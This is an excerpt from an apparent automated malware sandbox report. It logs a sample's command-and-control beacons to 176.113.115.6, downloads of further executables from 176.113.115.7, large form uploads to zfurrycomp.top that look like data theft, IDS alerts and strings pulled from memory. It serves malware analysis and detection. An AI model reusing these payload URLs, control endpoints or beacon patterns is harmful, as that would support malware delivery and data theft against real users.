Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 36 37 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10198670101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 36 38 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10198680101&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9

Source: Joe Sandbox View	IP Address: 176.113.115.7 176.113.115.7
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: SELECTELRU SELECTELRU

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49797 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49800 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49798 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49801 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49806 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49809 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49804 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49802 -> 104.21.112.1:443

Source: global traffic	HTTP traffic detected: POST /kFwo HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: zfurrycomp.top
Source: global traffic	HTTP traffic detected: POST /kFwo HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=iI8jpj01rTA3pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14896Host: zfurrycomp.top
Source: global traffic	HTTP traffic detected: POST /kFwo HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=F6M4JS265nrbKJqUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15055Host: zfurrycomp.top
Source: global traffic	HTTP traffic detected: POST /kFwo HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WofQ3yN5p7clj49LAOTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20564Host: zfurrycomp.top
Source: global traffic	HTTP traffic detected: POST /kFwo HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=k95R1b16fRLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2665Host: zfurrycomp.top
Source: global traffic	HTTP traffic detected: POST /kFwo HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Os3C5umiDKTabA26vijUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572234Host: zfurrycomp.top

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

Code function: 6_2_00AE05B0 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

6_2_00AE05B0

Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 176.113.115.7

Source: global traffic

DNS traffic detected: DNS query: zfurrycomp.top

Source: unknown

HTTP traffic detected: POST /kFwo HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: zfurrycomp.top

Source: rapes.exe, 00000006.00000002.3835775379.0000000001191000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000002.3835775379.0000000001160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.php
Source: rapes.exe, 00000006.00000002.3835775379.0000000001191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.php%
Source: rapes.exe, 00000006.00000002.3835775379.0000000001191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpa
Source: rapes.exe, 00000006.00000002.3835775379.0000000001191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpenu
Source: rapes.exe, 00000006.00000002.3835775379.0000000001160000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000002.3835775379.000000000114B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/fate/random.exe
Source: rapes.exe, 00000006.00000002.3835775379.0000000001160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/fate/random.exeodedf7L%
Source: rapes.exe, 00000006.00000002.3835775379.000000000114B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/fate/random.exexY
Source: rapes.exe, 00000006.00000002.3835775379.0000000001191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/unique2/random.exe
Source: 2ea5560900.exe, 0000000C.00000003.3690559422.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 2ea5560900.exe, 0000000C.00000003.3690559422.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 2ea5560900.exe, 0000000C.00000003.3690559422.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 2ea5560900.exe, 0000000C.00000003.3690559422.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 2ea5560900.exe, 0000000C.00000003.3690559422.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 2ea5560900.exe, 0000000C.00000003.3690559422.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 2ea5560900.exe, 0000000C.00000003.3690559422.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 2ea5560900.exe, 0000000C.00000003.3690559422.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 2ea5560900.exe, 0000000C.00000003.3690559422.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
